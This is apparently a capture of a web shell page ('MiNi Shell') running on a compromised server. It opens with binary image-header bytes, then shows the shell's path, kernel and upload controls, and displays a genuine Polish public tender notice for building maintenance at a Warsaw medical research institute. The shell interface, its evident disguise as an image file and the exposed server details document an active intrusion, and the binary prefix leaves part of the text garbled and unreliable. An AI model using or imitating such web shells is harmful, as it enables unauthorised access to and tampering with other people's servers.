JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250310/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250310/0013918801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług konserwacji oraz utrzymania technicznego w budynkach <br/>technicznych, laboratoryjno-biurowych Zamawiającego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Medycyny Doświadczalnej i Klinicznej im. Mirosława Mossakowskiego PAN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000326463</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Adolfa Pawińskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mkolasinski@imdik.pan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">imdik.pan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług konserwacji oraz utrzymania technicznego w budynkach <br/>technicznych, laboratoryjno-biurowych Zamawiającego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8dc76cf-622a-49c9-aab5-5d46972b1c3b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00139188</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://imdik-pan.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://imdik-pan.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">XII. INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie zapisami SWZ rozdział XXIV. RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie zapisami SWZ rozdział XXIV. RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP_261_03_2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia i wymagania techniczne określa (Załącznik nr.2 do SWZ Opis Przedmiotu Zamówienia wraz z załącznikami) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50711000-2 - Usługi w zakresie napraw i konserwacji elektrycznych instalacji budynkowych</p> <p class="mb-0">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający zastrzega sobie możliwość skorzystania z opcji rozszerzenia zakresu zamówienia o dodatkowe godziny pracy Wykonawcy przeznaczone na awarie/naprawy urządzeń i instalacji, które nie zostały objęte podstawowym zakresem OPZ. <br/>2. Ilość dodatkowych godzin do wykorzystania przez Zamawiającego na czynności naprawcze nie objęte zakresem zamówienia podstawowego- 1000 r/h <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ZGODNIE Z ZAPISAMIO SWZ ROZDZIAŁ X. OPIS KRYTERIÓW OCENY OFERT</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie peronelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM<br/>Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca prowadzi działalność gospodarczą zgodnie z przepisami obowiązującego prawa i jest wpisany do odpowiedniego rejestru (np. Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej). Na potwierdzenie Wykonawca złoży odpis z odpowiedniego rejestru <br/><br/>UPRAWNIENIA PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ DO LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW<br/>ZAMAWIAJĄCY UZNA, ŻE WARUNEK ZOSTAŁ <br/>1. Certyfikat F-gaz dla Przedsiębiorstw zajmujących się serwisem, montażem, kontrolą szczelności instalacji napełnionych czynnikiem chłodniczym oraz <br/>obrotem tymi czynnikami, wydany przez uprawnioną jednostkę certyfikującą Urząd Dozoru Technicznego (UDT), zgodnie z Ustawą z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (Dz. U. 2020 poz. 2065 ze zm.). <br/>Na Potwierdzenie Spełnienia Warunku Wykonawca Złoży: kopie posiadanego Certyfikatu F-gaz dla <br/>Przedsiębiorstw<br/><br/>SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ <br/>Wykonawca musi posiadać polisę odpowiedzialności cywilnej na kwotę nie mniejszą niż 600 000,00 zł <br/><br/>ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ <br/>I. PERSONEL <br/>Do realizacji zamówienia Wykonawca skieruje osoby posiadające co najmniej 2 letnie doświadczenie zawodowe w zakresie wykonywanych czynności oraz <br/>posiadające następujące uprawnienia: <br/>1. Świadectwo Egzaminu Kwalifikacyjnego Lutowacza Wykonującego Lutowanie Twarde, wydane przez jednostkę notyfikowaną. <br/>2. Uprawnienia w zakresie: a) Grupa G2 (E-eksploatacja i D-dozór) - <br/>Urządzenia wytwarzające, przetwarzające, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne, b) Grupa G1 SEP do 15kV i do 1kV (E-eksploatacja i D-dozór) - kwalifikacje w zakresie eksploatacji oraz dozoru instalacji, sieci i urządzeń elektroenergetycznych, c) Grupa G3 (E-eksploatacja i D-dozór) - kwalifikacje w zakresie eksploatacji oraz dozoru urządzeń, instalacji i sieci gazowych. W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest do złożenia: Wykazu osób skierowanych do realizacji zamówienia (załącznik nr 8 do SWZ),zawierającego informacje o posiadanych przez nie kwalifikacjach i uprawnieniach, Kopii dokumentów potwierdzających posiadanie wymaganych Uprawnienia te mogą być posiadane łącznie przez wykazane osoby przy czym osoby skierowane do pełnienia dyżuru lub przybyłe na zgłoszenie poza godzinami pracy Zamawiającego muszą posiadać łącznie wszystkie wymienione uprawnienia. <br/>II. DOŚWIADCZENIE <br/>1. Wykonawca winien wykazać, że wykonał co najmniej jedną usługę (w przypadku świadczeń powtarzających się lub ciągłych również dot. usług <br/>aktualnie wykonywanych), w okresie ostatnich 3 lat, (jeżeli okres prowadzenia działalności jest krótszy w tym okresie), wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa została wykonana lub jest wykonywana, trwającą nie krócej niż okres 12 miesięcy, obejmującą podobny (nie mniejszy) zakres do niniejszego zamówienia tj.: <br/>a) roboty konserwacyjne i utrzymania budynków; roboty konserwacyjne i utrzymania budynków Zwierzętarni lub innych budynków związanych <br/>z hodowlą zwierząt lub medycznych. b) roboty budowlano-sanitarne, c) roboty wodno-kanalizacyjne w tym kanalizacja technologiczna, d) obsługę, konserwację i eksploatacje wytwornic pary: wytwornice:300-1000 kw. e) obsługę, konserwację i eksploatacje instalacji central wentylacyjno-klimatyzacyjnych obsługiwanych przez system BMS, <br/>f) obsługę, konserwację i eksploatacje węzłów chłodu i agregatów chłodu <br/>g) roboty elektryczne Przy czym czynności opisane powyżej były wykonywane w obiekcie o rozbudowanej infrastrukturze technicznej tj.: posiadającym instalację 5 wodno-kanalizacyjną o min. zapotrzebowaniu wody <br/>30-50m3/h, moc węzła cieplnego min. grupy taryfowej <br/>A3/B1/C3 Na potwierdzenie należytego wykonania usług Wykonawca wraz z ww. załącznikiem zobowiązany jest przedstawić referencje lub inne dokumenty wystawione przez odbiorcę usługi, a w przypadku braku możliwości ich uzyskania – oświadczenie Wykonawcy z podaniem przyczyny braku dokumentu. Zamawiający może również zażądać przedłożenia faktur <br/>jako uzupełnienia dowodów należytego wykonania <br/>2. Wykonawca winien wykazać, że wykonał co <br/>najmniej jedną usługę (w przypadku świadczeń <br/>powtarzających się lub ciągłych również dot. usług <br/>aktualnie wykonywanych), w okresie ostatnich 3 <br/>lat, (jeżeli okres prowadzenia działalności jest <br/>krótszy w tym okresie), wraz z podaniem jej <br/>wartości, przedmiotu, daty wykonania i podmiotu, <br/>na rzecz którego usługa została wykonana lub jest <br/>wykonywana, trwającą nie krócej niż okres 12 <br/>miesięcy, obejmującą podobny (nie mniejszy) <br/>zakres do niniejszego zamówienia tj.: roboty <br/>serwisowe i czynności naprawcze utrzymania w <br/>sprawności i stałej konserwacji instalacji <br/>energetycznej i stacji transformatorowych 15 kV <br/>oraz agregatu prądotwórczego przy czym roboty te <br/>były wykonywane na obiekcie czynnie pracującym, <br/>którego działanie nie może być zakłócane <br/>przerwami w dostawie energii elektrycznej. <br/>Na potwierdzenie spełnienia warunków udziału w <br/>postępowaniu wykonawca złoży załącznik nr 7do SWZ <br/>tj. wykaz zrealizowanych usług <br/>Na potwierdzenie należytego wykonania usług wraz z <br/>ww. załącznikiem Wykonawca zobowiązany jest <br/>przedstawić <br/>referencje <br/>lub <br/>inne <br/>dokumenty <br/>wystawione przez odbiorcę usługi, a w przypadku braku <br/>możliwości ich uzyskania – oświadczenie Wykonawcy z <br/>podaniem przyczyny braku dokumentu. Zamawiający <br/>może również zażądać przedłożenia faktur jako <br/>uzupełnienia dowodów należytego wykonani <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku<br/> podstaw wykluczenia oraz potwierdzenia spełniania warunków udziału w postępowaniu (o ile zostały wyznaczone przez<br/> Zamawiającego), wykonawca wraz z ofertą składa oświadczenie, o którym mowa w art. 125 ust. 1 PZP, zgodnie ze wzorem<br/> określonym w Załączniku do SWZ <br/>Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności <br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o <br/>ochronie konkurencji i konsumentów (t.j. Dz.U. z 2024 r. poz. 594) z innym <br/>wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej <br/>grupy kapitałowej, w celu potwierdzenia braku podstawy do wykluczenia wykonawcy <br/>z postępowania, o której mowa w art. 108 ust. 1 pkt 5 PZP – według Załącznika <br/>do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności <br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o <br/>ochronie konkurencji i konsumentów (t.j. Dz.U. z 2024 r. poz. 594) z innym <br/>wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej <br/>grupy kapitałowej, w celu potwierdzenia braku podstawy do wykluczenia wykonawcy <br/>z postępowania, o której mowa w art. 108 ust. 1 pkt 5 PZP – według Załącznika nr 4 <br/>do SWZ. <br/>b) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych <br/>również wykonywanych, nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, <br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których te usługi zostały <br/>wykonane lub są wykonywane (wg wzoru stanowiącego Załącznik nr 6 do SWZ), wraz <br/>z załączeniem dowodów określających, czy usługi zostały wykonane lub są <br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź <br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały <br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, <br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy -; w przypadku świadczeń powtarzających <br/>się <br/>lub ciągłych nadal wykonywanych referencje bądź inne dokumenty <br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie <br/>ostatnich 3 miesięcy <br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, w <br/>szczególności odpowiezialncyh za świadczenie usług, wraz z informacjami na temat <br/>ich kwalifikacji zawodowych i uprawnień, niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o <br/>podstawie do dysponowania tymi osobami - Załącznik nr 5 do SWZ <br/>d) odpis lub Informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do <br/>9 <br/>rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu <br/>o art. 109 ust. 1 pkt 4 Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej <br/>e) Polisa odpowiedzialności cywilnej zgodnie z rozdziałem V SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ROZDZIAŁ SWZXXV. ZAŁĄCZNIKI DO SWZ <br/>1) Załącznik 1- Formularz ofertowy <br/>2) Załącznik 2- Opis Przedmiotu Zamówienia wraz z załącznikami <br/>3) Załącznik 3- Oświadczenia Wykonawcy z art. 125 ust. 1 PZP <br/>4) Załącznik 4- Oświadczenie o grupie kapitałowej <br/>5) Załącznik 5- Oświadczenie dla wykonawców wspólnie ubiegających się o realizację <br/>zamówienia <br/>6) Załącznik 6- Wzór zobowiązania podmiotów trzecich do oddania do dyspozycji wykonawcy <br/>niezbędnych zasobów na potrzeby <br/>7) Załącznik 7- Wykaz wykonanych usług <br/>8) Załącznik 8- Wykaz personelu skierowanego do realizacji postępowania <br/>9) Załącznik 9- Wzór umowy <br/>10) Załącznik 10- Wzór zgłoszenia do wizji lokalnej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z zapisami SWZ ROZDZIAŁ XVII. INFORMACJE DOTYCZĄCE WYKONAWCY WSPÓLNIE UBIEGAJĄCYCH SIĘ O ZAMÓWIENIE I <br/>PODWYKONAWCY <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany <br/>kontraktowe), w stosunku do treści oferty, na podstawie której dokonano wyboru <br/>Wykonawcy, zgodnie z warunkami podanymi w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://imdik-pan.ezamawiajacy.pl/servlet/HomeServle</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-18 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com